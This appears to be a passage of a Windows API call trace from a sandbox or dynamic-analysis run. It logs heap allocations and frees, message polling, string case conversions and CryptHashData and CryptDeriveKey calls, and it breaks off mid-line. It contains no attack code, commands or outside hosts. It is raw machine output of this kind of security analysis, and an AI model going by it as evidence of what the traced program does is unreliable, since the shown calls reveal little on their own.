[0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0187.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.994] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0187.994] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.995] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0187.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.995] CryptHashData (hHash=0xaa5820, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0187.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0187.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.997] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.998] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.999] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0187.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.999] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0187.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.000] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.001] CryptDeriveKey (in: hProv=0xaad240, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.006] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.006] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.006] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.007] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.007] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.007] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.008] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.008] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 